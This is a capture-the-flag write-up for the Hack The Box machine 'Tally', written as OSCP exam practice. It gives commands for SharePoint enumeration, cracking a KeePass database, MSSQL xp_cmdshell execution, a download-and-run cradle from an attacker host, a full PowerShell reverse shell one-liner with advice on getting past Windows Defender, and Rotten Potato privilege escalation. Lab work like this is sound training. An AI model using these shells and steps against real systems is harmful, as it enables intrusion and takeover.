Hack The Box / Tally

Tally is our third machine in the OSCP list provided by NetSec Focus! This machine was a great learning experience where the solution problem and research skills were essential in order to root this machine. This is the third blog before my third attempt to the OSCP exam, so let’s get to it!

Information Gathering

Nmap Scan

So, we start with a nmap scan to check what ports are open and what services are running in this machine.

nmap -sC -sV -p- -oN scan.nmap 10.10.10.59

So, we see some SMB, MSSQL and HTTP services running where all of them are going to be useful. The enumeration in this box is quite extense, but with some persistence and patiente, the clues are going to be coming out one at the time. I also tried to scan most of the HTTP services with not good result, but there was one that actually was useful that I’ll explain later. After looking at the smb service running, I tried to do some scanning to see if I could find anything, but unf ortunately the result was not helpful.

But after looking for more resources and things to look up in our nmap scan, there was a good attack vector that was related with Microsoft Sharepoint running in port 32844.

Directory & URL Brute Force

After looking how other people did this machine, there were a lot of ideas and tools. One of the tools was the SharePountURLBrute that was accurate in some results. This is the command in order to use the tool:

perl SharePointURLBrute.pl -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt

Although other people runned gobuster to get some results, but in my case SharePountURLBrute gave more accurate results. In the case if you want to run gobuster, I strongly recommend to download SecLists in order to have good results. This is the command to run gobuster.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://10.10.10.59/

After finding a couple URLs, the URl that gave useful information was http://10.10.10.59/shared%20documents/forms/allitems.aspx where there was some details about the ftp log in.

After downloading the file, we have the following information.

Great! There is a password, but we don’t have a username. It’s time to look for more URLs in Microsoft Sharepoint. After trying more tools and not finding results, I tried to look on google things like "sharepoint site content url" where it came up with this useful resource. So, according to the site one of the URLs that contains information and content was http://10.10.10.59/_layouts/15/viewlsts.aspx where effectively there was something to look!

So after visiting http://10.10.10.59/SitePages/FinanceTeam.aspx There was a useful file from the Finance Team that contained useful information about the ftp_server.

This is the information that is related with the ftp user account.

Gratefully, we have username and password which means ftp_user:UTDRSCH53c"$6hys

FTP Findings

Then, after trying the credentials, log in was successsful.

Once we are in the ftp server there is a interesting file that we can find at \User\Tim\Files which is a KeePass file that will be helpful to look more credentials.

Cracking passwords

Once you find it and get it, you can crack it with keepass2john in order to obtain and extrack the hash with the following command.

keepass2john tim.kdbx > tim

After we have the hash from thh kdbx file, it’s time to crack it wiht John!

john -w=/usr/share/wordlists/rockyou.txt tim

Then it’s time to get in with our credentials tim:simplementeyo.

If you need more information on how to do the process showed above, do not forget to visit my writeup for Jeeves where I explain the process with detail.

SMB Findings

After getting in the password manager, there is some information about the Finance user, and if we think about what services we can get in, there is a good chance that we can log in with SMB. So to log in in SMB these are the credentials: Finance:Acc0unting. This is the command to log in with SMB.

smbclient -U Finance \\\\10.10.10.59\\ACCT

After looking around in the server and files, in the location \zz_Migration\Binaries\New Folder there is a executable called tester.exe where looks like it’s been customized and therefore it can contain useful information, so after downloading the file tester.exe there is a good way to look to possible info with the command strings.

strings tester.exe | grep "UID"

Then we have credentials sa:GWE3V65#6KFH93@4GWTG2G for MSSQL ツ To log in in MSSQL there is a good tool in Kali Linux called sqsh that allows login in MSSQL and various services and it’s a sql shell for linux. So, after googling "MSSQL reverse shell" it came up with the resource and usage of xp_cmdshell which allows to execute commands from the command prompt in some kidn of RCE (Remote Code Execution), the problem is that xp_cmdshell is desable, but we can enable it following this resource. So, this is the command to log in MSSQL with sqsh.

sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

Then, time to get the reverse shell.

Reverse shell

To do this we can use xp_cmdshell to execute a command that will download a powershell script from Nishang that will return us a reverse shell to our local machine. Do not forget to put this in the last line of the script Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.80 -Port 4444 otherwise the script won’t work and do not forget to set up a netcat listener and a python HTTP server. This is the following command to execute within sqsh using xp_cmdshell.

xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.80/Invoke-PowerShellTcp.ps1') "

and wolah! We got a shell.

User flag

In order to get the user flag we need to navigate to C:\Users\Sarah\Desktop and type type user.txt and we got the flag!

Privilege Escalation

This time I decided to use Rotten Potato without metasploit because in the enumeration there was enough resources to escalate privileges in this way. To start type:

whoami /priv

And we have enough privileges to use Rotten Potato. We can go to any directory where we have executable and writeable privileges in order to transfer [MSFRottenPotato.exe]. Also this machine is running Windows 10 from 2016 which is more likely to have Windows Defender, so be wise about the reverse shell that you want to execute with Rotten Potato. In this case I decided to use a powershell script that Windows Defender won’t recognize as a malicious file, so create a file in your linux machine named shell.bat and type the following code:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.80',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

and transfer it to the windows machine. You can use veil-evasion or Ebowla where both of them are nice tools, but this time I decided to keep it simple as possible.

Executing Rotten Potato

Before executing Rotten Potato do not forget to set up a listener with netcat in the port that you have decided to use to get the reverse shell. After the listener is up in you reverse shell type:

C:\Users\Sarah\Documents\MSFRottenPotato.exe t C:\Users\Sarah\Documents\shell.bat

and we have a reverse shell as authority system!

Root Flag

Navigate through C:\\Users\Administrator\Desktop\ and type type root.txt.

And we have root!

To conclude

This machine took me too long due to the extense enumeration required. I learned to use certain tools such as sqsh and also to check the nmap scan well because some of the rabbit holes were because I didn’t read well the nmap scan which had enough clues to try different things, but definetelly it was a fun box.